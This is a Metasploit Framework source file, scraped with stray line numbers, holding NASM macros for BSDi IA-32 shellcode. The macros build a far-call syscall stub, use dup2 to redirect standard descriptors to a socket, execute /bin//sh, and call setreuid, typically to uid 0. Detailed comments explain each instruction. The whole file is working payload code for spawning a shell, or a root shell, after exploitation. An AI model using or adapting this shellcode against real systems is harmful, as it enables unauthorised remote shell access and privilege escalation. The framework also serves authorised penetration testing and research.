GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/bsdi/ia32/generic.asm
1
;;
2
;
3
; Name: generic
4
; Type: Macro Set
5
; Qualities: None
6
; Authors: skape <mmiller [at] hick.org>
7
; Version: $Revision: 1633 $
8
; License:
9
;
10
; This file is part of the Metasploit Exploit Framework
11
; and is subject to the same licenses and copyrights as
12
; the rest of this package.
13
;
14
; Description:
15
;
16
; This file provides a generic API of macros that can be used
17
; by payloads. No payloads are actually implemented within this
18
; file.
19
;
20
; Macro List:
21
;
22
; execve_binsh - Executes a command shell with flags
23
; setreuid - Set real/effective user id
24
;;
25
BITS 32                                 ; 32-bit (IA-32) code throughout this file
;;
28
; Define undefined assumptions
29
;;
30
; Callers may pre-define ASSUME_REG_EDX / ASSUME_REG_EAX to tell the macros
; below what a register already holds on entry, letting them skip the
; instructions that would set it.  The macros test for EDX == 2 and
; EAX == 0; -1 is the "nothing known" default.
%ifndef ASSUME_REG_EDX
%define ASSUME_REG_EDX -1               ; -1: no assumption about edx
%endif
%ifndef ASSUME_REG_EAX
%define ASSUME_REG_EAX -1               ; -1: no assumption about eax
%endif
;;
38
;
39
; Macro: initialize_lcall_esi
40
; Purpose: Builds an lcall/ret stub and points esi at it
41
;;
42
%macro initialize_lcall_esi 0

; Lays an 8-byte stub on the stack and leaves esi pointing at it, so the
; other macros can enter the kernel with a plain `call esi`.  Byte layout
; of the stub (low to high address) after the two pushes:
;   9a 00 00 00 00 07 00    lcall 0x7:0x0   (far call to the syscall gate)
;   c3                      ret
; Out:   esi -> stub, edx = 0
; Clobb: eax, edx, flags; 8 bytes of stack
push dword 0xc3000700                   ; bytes 00 07 00 c3: selector 0x0007, then ret
mov eax, 0x9a                           ; 0x9a = far-call (lcall ptr16:32) opcode
cdq                                     ; edx = 0 (eax is positive); not used here, presumably for callers
push eax                                ; bytes 9a 00 00 00: opcode + low offset bytes
mov esi, esp                            ; esi -> start of the stub

%endmacro
;;
53
; Macro: execve_binsh
54
; Purpose: Execute a command shell with various options
55
; Arguments:
56
;
57
; Execution flags: Flags used for executing the command shell in a
58
; number of modes.
59
;
60
; EXECUTE_REDIRECT_IO => Redirects stdin/stdout/stderr to the fd
61
; passed in 'edi'.
62
;;
63
%define EXECUTE_REDIRECT_IO 0x0001      ; bit in execve_binsh's flags argument
%macro execve_binsh 1

%if %1 & EXECUTE_REDIRECT_IO

; Redirect fds 2, 1, 0 (in that order) onto the fd held in edi (or in ebx
; when FD_REG_EBX is defined) with dup2(fd, n) via the esi stub.
; Register roles: ecx -- or edx when ASSUME_REG_EDX == 2 -- is both the
; target fd and the loop counter; eax carries the syscall number.
; NOTE(review): dup, dup_loop and execve are ordinary (non-%%) labels, so
; a second expansion of this macro in one file would redefine them.
dup:
%if ASSUME_REG_EDX != 2
push byte 0x2                           ; ecx = 2: begin with stderr
pop ecx
%endif
dup_loop:
%if ASSUME_REG_EAX == 0
mov al, 0x5a                            ; eax = 0x5a (dup2); relies on upper bytes being 0
%else
push byte 0x5a                          ; eax = 0x5a (dup2) regardless of prior contents
pop eax
%endif
%if ASSUME_REG_EDX == 2
push edx                                ; 2nd arg: new fd (loop counter)
%else
push ecx                                ; 2nd arg: new fd (loop counter)
%endif
%ifdef FD_REG_EBX
push ebx                                ; 1st arg: fd to duplicate
%else
push edi                                ; 1st arg: fd to duplicate
%endif
call esi                                ; dup2(fd, n) through the lcall/ret stub
%if ASSUME_REG_EDX == 2
dec edx                                 ; next lower fd; SF set once it passes 0
%else
dec ecx
%endif
jns dup_loop                            ; iterate n = 2, 1, 0

; The final iteration asked for fd 0; on success dup2 returns the new fd,
; so eax is treated as zero from here on (shorter `mov al` below).
%undef ASSUME_REG_EAX
%define ASSUME_REG_EAX 0

%endif

; execve(path, argv, envp) with path = "/bin//sh" built on the stack:
; "/bin" + "//sh" followed by a zero dword as terminator.
execve:
%if ASSUME_REG_EAX == 0
push eax                                ; zero dword terminating the string
%else
push byte 0x3b                          ; eax = 0x3b (execve)
pop eax
cdq                                     ; edx = 0 (eax positive)
push edx                                ; zero dword terminating the string
%endif
push dword 0x68732f2f                   ; "//sh"
push dword 0x6e69622f                   ; "/bin"
mov ebx, esp                            ; ebx -> "/bin//sh"
push eax                                ; 3rd arg: envp slot (holds eax's current value)
push esp                                ; 2nd arg: argv -> the slot just pushed
push ebx                                ; 1st arg: path
%if ASSUME_REG_EAX == 0
mov al, 0x3b                            ; eax = 0x3b (execve); upper bytes assumed 0
%endif
call esi                                ; execve via the lcall/ret stub

%endmacro
;;
127
; Macro: setreuid
128
; Purpose: Set real and effective user id
129
; Arguments:
130
;
131
; User ID: The user identifier to setreuid to, typically 0.
132
;;
%macro setreuid 1

; setreuid(%1, %1) through the esi stub: eax is loaded with the uid,
; pushed twice (real and effective), then replaced by the syscall number.
; In:    esi -> lcall/ret stub (see initialize_lcall_esi)
; Clobb: eax, flags; 8 bytes of stack
; NOTE(review): the label below is an ordinary (non-%%) label, so a second
; expansion in one file would redefine it.
setreuid:

%if %1 == 0

xor eax, eax                            ; uid 0 without an immediate

%else

%if %1 < 256

push byte %1                            ; NOTE(review): imm8 is sign-extended, so 128..255 become negative -- verify the intended bound

%else

push dword %1

%endif

pop eax                                 ; eax = uid

%endif

push eax                                ; 2nd arg: euid
push eax                                ; 1st arg: ruid
mov al, 0x7e                            ; eax = 0x7e (setreuid); assumes eax's upper 24 bits are 0
call esi                                ; setreuid(ruid, euid)

%endmacro